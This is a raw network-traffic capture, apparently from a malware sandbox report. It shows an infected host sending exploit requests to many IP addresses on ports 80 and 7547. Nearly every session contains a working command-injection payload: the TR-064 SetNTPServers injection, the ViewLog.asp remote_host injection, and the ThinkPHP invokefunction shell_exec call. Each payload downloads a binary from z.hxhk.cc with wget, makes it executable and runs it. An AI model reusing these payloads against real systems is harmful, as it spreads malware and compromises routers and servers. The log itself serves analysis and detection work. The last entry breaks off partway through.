Mar 18, 2024 09:57:01.306981087 CET	747	OUT	POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: r00ts3c-owned-you SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://z.hxhk.cc/sys64.mips; chmod 777 sys64.mips; ./sys64.mips tr.s`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope Data Raw: Data Ascii:
Mar 18, 2024 09:57:01.541351080 CET	197	IN	HTTP/1.1 404 Not Found Date: Mon Mar 18 11:57:00 2024 Server: tr069 http server Content-Length: 15 Connection: close Content-Type: text/plain; charset=ISO-8859-1 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: File not found

Session ID	Source IP	Source Port	Destination IP	Destination Port
76	192.168.2.23	35404	169.155.59.0	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:01.474138021 CET	454	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 127.0.0.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: r00ts3c-owned-you Content-Length: 176 Content-Type: application/x-www-form-urlencoded Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 7a 2e 68 78 68 6b 2e 63 63 2f 73 79 73 36 34 2e 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 73 79 73 36 34 2e 61 72 6d 37 3b 2e 2f 73 79 73 36 34 2e 61 72 6d 37 2b 7a 79 2e 73 3b 72 6d 2b 2d 72 66 2b 73 79 73 36 34 2e 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://z.hxhk.cc/sys64.arm7;chmod+777+sys64.arm7;./sys64.arm7+zy.s;rm+-rf+sys64.arm7%3b%23&remoteSubmit=Save

Session ID	Source IP	Source Port	Destination IP	Destination Port
77	192.168.2.23	55476	34.107.234.170	7547

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:01.515697002 CET	747	OUT	POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: r00ts3c-owned-you SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://z.hxhk.cc/sys64.mips; chmod 777 sys64.mips; ./sys64.mips tr.s`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
78	192.168.2.23	34780	82.67.18.36	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:01.550148010 CET	454	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 127.0.0.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: r00ts3c-owned-you Content-Length: 176 Content-Type: application/x-www-form-urlencoded Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 7a 2e 68 78 68 6b 2e 63 63 2f 73 79 73 36 34 2e 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 73 79 73 36 34 2e 61 72 6d 37 3b 2e 2f 73 79 73 36 34 2e 61 72 6d 37 2b 7a 79 2e 73 3b 72 6d 2b 2d 72 66 2b 73 79 73 36 34 2e 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://z.hxhk.cc/sys64.arm7;chmod+777+sys64.arm7;./sys64.arm7+zy.s;rm+-rf+sys64.arm7%3b%23&remoteSubmit=Save
Mar 18, 2024 09:57:01.717875004 CET	324	IN	HTTP/1.1 302 Found X-Powered-By: Express Location: https://127.0.0.1/cgi-bin/ViewLog.asp Vary: Accept Content-Type: text/plain; charset=utf-8 Content-Length: 59 Date: Mon, 18 Mar 2024 08:57:01 GMT Connection: keep-alive Keep-Alive: timeout=5 Data Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 31 32 37 2e 30 2e 30 2e 31 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 Data Ascii: Found. Redirecting to https://127.0.0.1/cgi-bin/ViewLog.asp
Mar 18, 2024 09:57:01.725063086 CET	59	IN	HTTP/1.1 400 Bad Request Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
79	192.168.2.23	53010	176.56.242.49	7547

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:01.581043005 CET	735	OUT	POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: r00ts3c-owned-you SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://z.hxhk.cc/sys64.mips; chmod 777 sys64.mips; ./sys64.mips tr.s`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope Data Raw: Data Ascii:
Mar 18, 2024 09:57:04.745899916 CET	735	OUT	POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: r00ts3c-owned-you SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://z.hxhk.cc/sys64.mips; chmod 777 sys64.mips; ./sys64.mips tr.s`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope Data Raw: Data Ascii:
Mar 18, 2024 09:57:10.892605066 CET	735	OUT	POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: r00ts3c-owned-you SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://z.hxhk.cc/sys64.mips; chmod 777 sys64.mips; ./sys64.mips tr.s`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope Data Raw: Data Ascii:
Mar 18, 2024 09:57:22.920061111 CET	735	OUT	POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: r00ts3c-owned-you SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://z.hxhk.cc/sys64.mips; chmod 777 sys64.mips; ./sys64.mips tr.s`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope Data Raw: Data Ascii:
Mar 18, 2024 09:57:47.239361048 CET	735	OUT	POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: r00ts3c-owned-you SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://z.hxhk.cc/sys64.mips; chmod 777 sys64.mips; ./sys64.mips tr.s`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope Data Raw: Data Ascii:
Mar 18, 2024 09:58:36.381006002 CET	735	OUT	POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: r00ts3c-owned-you SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://z.hxhk.cc/sys64.mips; chmod 777 sys64.mips; ./sys64.mips tr.s`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
80	192.168.2.23	56124	213.147.190.5	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:01.582948923 CET	454	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 127.0.0.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: r00ts3c-owned-you Content-Length: 176 Content-Type: application/x-www-form-urlencoded Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 7a 2e 68 78 68 6b 2e 63 63 2f 73 79 73 36 34 2e 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 73 79 73 36 34 2e 61 72 6d 37 3b 2e 2f 73 79 73 36 34 2e 61 72 6d 37 2b 7a 79 2e 73 3b 72 6d 2b 2d 72 66 2b 73 79 73 36 34 2e 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://z.hxhk.cc/sys64.arm7;chmod+777+sys64.arm7;./sys64.arm7+zy.s;rm+-rf+sys64.arm7%3b%23&remoteSubmit=Save
Mar 18, 2024 09:57:01.790110111 CET	336	IN	HTTP/1.1 405 Not Allowed Server: nginx Date: Mon, 18 Mar 2024 08:57:01 GMT Content-Type: text/html Content-Length: 150 Connection: keep-alive Keep-Alive: timeout=20 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>
Mar 18, 2024 09:57:01.793750048 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Mon, 18 Mar 2024 08:57:01 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
81	192.168.2.23	51798	200.20.113.20	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:01.625216007 CET	454	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 127.0.0.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: r00ts3c-owned-you Content-Length: 176 Content-Type: application/x-www-form-urlencoded Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 7a 2e 68 78 68 6b 2e 63 63 2f 73 79 73 36 34 2e 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 73 79 73 36 34 2e 61 72 6d 37 3b 2e 2f 73 79 73 36 34 2e 61 72 6d 37 2b 7a 79 2e 73 3b 72 6d 2b 2d 72 66 2b 73 79 73 36 34 2e 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://z.hxhk.cc/sys64.arm7;chmod+777+sys64.arm7;./sys64.arm7+zy.s;rm+-rf+sys64.arm7%3b%23&remoteSubmit=Save
Mar 18, 2024 09:57:01.863378048 CET	408	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Mon, 18 Mar 2024 08:56:49 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Location: https://127.0.0.1/cgi-bin/ViewLog.asp X-Frame-Options: SAMEORIGIN Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
Mar 18, 2024 09:57:01.863389969 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Mon, 18 Mar 2024 08:56:49 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
82	192.168.2.23	55704	34.107.234.170	7547

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:01.644913912 CET	747	OUT	POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: r00ts3c-owned-you SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://z.hxhk.cc/sys64.mips; chmod 777 sys64.mips; ./sys64.mips tr.s`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
83	192.168.2.23	39610	95.59.177.220	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:01.829579115 CET	320	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: r00ts3c-owned-you
Mar 18, 2024 09:57:03.178122997 CET	320	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: r00ts3c-owned-you
Mar 18, 2024 09:57:03.438477993 CET	29	IN	HTTP/1.1 200 OK
Mar 18, 2024 09:57:03.438555002 CET	515	IN	Data Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www

Session ID	Source IP	Source Port	Destination IP	Destination Port
84	192.168.2.23	57464	24.209.204.179	7547

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:01.889364004 CET	747	OUT	POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: r00ts3c-owned-you SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://z.hxhk.cc/sys64.mips; chmod 777 sys64.mips; ./sys64.mips tr.s`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
85	192.168.2.23	49352	72.27.193.199	7547

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:01.911607027 CET	747	OUT	POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: r00ts3c-owned-you SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://z.hxhk.cc/sys64.mips; chmod 777 sys64.mips; ./sys64.mips tr.s`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope Data Raw: Data Ascii:
Mar 18, 2024 09:57:02.053025961 CET	88	IN	HTTP/1.1 500 Internal Server Error Connection: Close Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
86	192.168.2.23	47724	163.182.121.40	7547

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:01.948729992 CET	747	OUT	POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: r00ts3c-owned-you SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://z.hxhk.cc/sys64.mips; chmod 777 sys64.mips; ./sys64.mips tr.s`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope Data Raw: Data Ascii:
Mar 18, 2024 09:57:02.077666044 CET	96	IN	HTTP/1.1 400 Bad Request Content-Length: 0 Date: Mon, 18 Mar 2024 08:57:01 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port
87	192.168.2.23	34846	170.249.13.75	7547

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:02.010818958 CET	747	OUT	POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: r00ts3c-owned-you SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://z.hxhk.cc/sys64.mips; chmod 777 sys64.mips; ./sys64.mips tr.s`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope Data Raw: Data Ascii:
Mar 18, 2024 09:57:02.159013987 CET	174	IN	HTTP/1.1 400 Bad Request Content-Length: 0 Date: Mon, 18 Mar 2024 08:57:42 GMT X-Frame-Options: sameorigin Content-Security-Policy: frame-ancestors 'self'

Session ID	Source IP	Source Port	Destination IP	Destination Port
88	192.168.2.23	54436	82.180.57.141	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:02.047044992 CET	454	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 127.0.0.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: r00ts3c-owned-you Content-Length: 176 Content-Type: application/x-www-form-urlencoded Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 7a 2e 68 78 68 6b 2e 63 63 2f 73 79 73 36 34 2e 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 73 79 73 36 34 2e 61 72 6d 37 3b 2e 2f 73 79 73 36 34 2e 61 72 6d 37 2b 7a 79 2e 73 3b 72 6d 2b 2d 72 66 2b 73 79 73 36 34 2e 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a Data Ascii: 